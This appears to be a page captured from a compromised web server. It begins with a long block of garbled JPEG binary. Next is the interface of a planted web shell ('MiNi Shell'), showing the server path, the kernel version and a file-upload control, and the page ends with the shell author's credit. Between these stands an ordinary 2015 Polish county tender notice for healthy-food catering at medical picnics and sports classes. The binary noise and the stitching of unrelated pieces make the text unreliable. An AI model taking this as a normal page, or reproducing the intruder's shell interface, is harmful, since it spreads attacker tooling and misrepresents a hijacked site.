JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150529/128380-N-2015.html

<p class="kh_header"><b>Przasnysz: Świadczenie usług cateringowych ze zdrową żywnością dla uczestników pikników medycznych oraz uczestników zajęć sportowych w ramach Projektu pn. Profilaktyka chorób układu krążenia szansą na poprawę sytuacji zdrowotnej mieszkańców powiatu przasnyskiego</b><br>
<b>Numer ogłoszenia: 128380 - 2015; data zamieszczenia: 29.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Św. Stanisława Kostki 5, 06-300 Przasnysz, woj. mazowieckie, tel. 029 7522270 w.121, faks 029 7522270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat-przasnyski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych ze zdrową żywnością dla uczestników pikników medycznych oraz uczestników zajęć sportowych w ramach Projektu pn. Profilaktyka chorób układu krążenia szansą na poprawę sytuacji zdrowotnej mieszkańców powiatu przasnyskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1)	Świadczenie usług w zakresie cateringu ze zdrową żywnością dla uczestników 15 pikników medycznych w powiecie przasnyskim:
a.	Świadczenie usług cateringowych będzie odbywało się sukcesywnie w miarę potrzeb Zamawiającego w okresie obowiązywania umowy w ramach 15 pikników medycznych organizowanych przez Zamawiającego ale nie dłużej niż do 31.12.2015r.
b.	Szczegółowy harmonogram w tym zakresie zostanie ustalony przez Zamawiającego. 
c.	Przedmiotowa usługa będzie świadczona w granicach powiatu przasnyskiego tj. 5 spotkań w Przasnyszu oraz 10 spotkań na terenie powiatu przasnyskiego.
d.	Każdorazowo Zamawiający będzie informował Wykonawcę o miejscu świadczenia usługi, terminie i planowanej liczbie uczestników na 7 dni przed realizacją zamawianej usługi cateringowej. Pierwszy piknik medyczny planuje się na 30 maja 2015 r. w Przasnyszu.
e.	Planuje się, że liczba osób korzystających z pikników medycznych wyniesie łącznie 4.500 osób. Przewidziano przeprowadzenie 5 serii pikników w Przasnyszu dla ok 500 osób każdy i po 2 serie w gminach: Chorzele, Czernice Borowe, Jednorożec, Krasne i Krzynowłoga Mała dla ok 200 osób każdy.
f.	Pełna usługa cateringu na piknikach medycznych winna obejmować serwis zdrowej żywności w tym kanapek i owoców dla łącznie 4.500 osób tj.:
owoce: preferowane 2 rodzaje na osobędo wyboru np. jabłko, gruszka, banan, kiść winogron, kiwi- umyte, gotowe do spożycia;
kanapki typu sandwich(składane): zróżnicowane składnikowo, minimum 5 różnych składników w kanapce z wykorzystaniem: minimum 3 rodzaje pieczywa (ciemnego), 3 rodzaje wędlin (wysokogatunkowych), 3 rodzaje serów (dojrzewających), łosoś wędzony, pieczone lub grillowane mięso, sałata, masło, minimum 3 kanapki na osobę;
warzywa: pomidor, ogórek, rzodkiewka (minimum 3 szt. rzodkiewki), marchewka, kalarepa- wszystkie warzywa umyte i gotowe do spożycia, minimum 2 rodzaje na osobę do wyboru;
napoje: woda niegazowana w butelkach 0,5 l na osobę, sok pomidorowy w szklanych butelkach o pojemności 0,3 l na osobę o zawartości sodu nie więcej niż 0,2 g.
g;	Kanapki i owoce winny być przechowywane lub sukcesywnie dowożone w taki sposób, aby ich jakość nie uległa zmianie przez czas trwania każdego pikniku z powodu wysokiej temperatury lub innych czynników mogących spowodować pogorszenie ich jakości.
h.	Kanapki podawane powinny być na tacy jednorazowej (po 25 szt. taca), możliwość dowolnej kompozycji na tacy. Każda kanapka powinna być zapakowana osobno w folię spożywczą.
i.	W ramach zamówienia Wykonawca zobowiązany jest do zapewnienia:                                                                                                        wyposażenia niezbędnego do obsługi cateringowej tj.: stoły, obrusy materiałowe, talerzyki jednorazowe do kanapek, kubki jednorazowe do napojów, serwetki papierowe itp. w sposób uzgodniony z Zamawiającym;                                                                                              estetycznego przygotowania i podawania żywności;                                                                                                                 dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem pikniku medycznego;                                                                                                 obsługi cateringu (niezbędny personel w odpowiedniej ilości);
usługi sprzątania: zebrania naczyń oraz resztek pokonsumpcyjnych najpóźniej 30 min. po zakończeniu pikniku medycznego.

2)	Świadczenie usług w zakresie cateringu ze zdrową żywnością dla uczestników zajęć sportowych w obiekcie sportowym.
a.	Świadczenie usług cateringowych będzie odbywało się sukcesywnie w miarę potrzeb Zamawiającego w okresie obowiązywania umowy przez Wykonawcę ale nie dłużej niż do 30.04.2016r.
b.	Szczegółowy harmonogram w tym zakresie zostanie ustalony przez Zamawiającego.
c.	Planuje się, że przedmiotowa usługa winna być świadczona w obiekcie sportowym w odległości maksymalnie 45 minut drogi od centralnego punktu powiatu czyli Przasnysza. 
d.	Planuje się, że łączna liczba zestawów prowiantowych w postaci serwisu zdrowej żywności dla osób korzystających z zajęć sportowych wyniesie 136.000 zestawów tj.:                                                                                                                           usługa cateringowa dla osób korzystających z oferty basenu- 135.000 zestawów prowiantowych;                                                                                                                                            usługa cateringowa dla osób korzystających z oferty zajęć usprawniających- 1.000 zestawów prowiantowych;
e.	Catering ze zdrową żywnością winien obejmować: 
wodę niegazowaną w butelkach 0,5 l / osobę, sok pomidorowy w szklanych butelkach o pojemności 0,3 l na osobę o zawartości sodu nie więcej niż 0,2 g- różne rodzaje suszonych owoców - minimum 50 g na osobę (oryginalnie pakowane w torebkach) do wyboru dla uczestników suszone: jabłka, śliwki, morele i banany, raz w tygodniu zamiast suszonych owoców Wykonawca winien dostarczać: pestki dyni i słonecznika minimum 150 g na osobę do wyboru (oryginalnie zapakowane w torebkach);
zdrowy baton wielozbożowy o wadze 30 do 40 g na osobę- zapakowany, gotowy do spożycia po otwarciu;
Każdy zestaw zapakowany i zamknięty osobno w torebki foliowe.
f.	W ramach zamówienia Wykonawca zobowiązany jest do zapewnienia:                                                                                                        wyposażenia niezbędnego do obsługi cateringowej w sposób uzgodniony z Zamawiającym;                                                                                                                                                       estetycznego podawania żywności;                                                                                                               dostarczania posiłków na miejsce wskazane przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem zajęć;                                                                                                                                               obsługi cateringu tj. niezbędny personel do dostarczenia zdrowej żywności do wyznaczonego miejsca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 10.000,00 PLN (słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku Zamawiający dokonana na podstawie   
  oświadczenia zał. Nr 2 oraz wykazu doświadczenia zał. Nr 6</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie wypełnionych oświadczeń zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie wypełnionych oświadczeń zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie wypełnionych oświadczeń zał. Nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-przasnysz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Przasnyszu, 06-300 Przasnysz, ul. Św. Stanisława Kostki 5, pokój 88.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2015 godzina 10:00, miejsce: Starostwo Powiatowe w Przasnyszu, 06-300 Przasnysz, ul. Św. Stanisława Kostki 5, pokój 84 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Profilaktyka chorób układu krążenia szansą na poprawę sytuacji zdrowotnej mieszkańców powiatu przasnyskiego  w ramach Programu PL13 Ograniczenie społecznych nierówności w zdrowiu finansowanego ze środków Norweskiego Mechanizmu Finansowego 2009-2014 oraz budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com